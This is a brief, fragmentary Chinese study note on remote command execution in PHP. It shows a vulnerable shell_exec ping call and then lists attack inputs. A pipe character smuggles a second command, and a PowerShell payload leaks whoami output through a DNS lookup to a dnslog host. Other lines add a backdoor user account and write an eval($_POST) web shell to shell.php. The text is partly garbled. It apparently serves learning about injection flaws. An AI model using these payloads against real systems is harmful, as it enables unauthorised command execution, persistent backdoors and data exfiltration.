RCE 学习
ping类型,执行系统命令
1 | $result.=shell_exec('ping '.$ip) |
echo可以执行系统命令
无回显页面
useradd xiaodisec
passwd xiaodisec 需要输入密码(无回显很难设置)
标点特征
1 | `| ` 把前一个命令输入到后一个 |
whoami
.dns…com
1 |
|
127.0.0.1 | powershell $x=whoami;$x=$x.Replace(‘',’xxx’);$y=’dns.log’;$z=$x+$y;ping $z
1 |
|
eval($_POST[‘txt’]
1 |
|
fputs(fopen(‘shell.php’,’w’),’‘);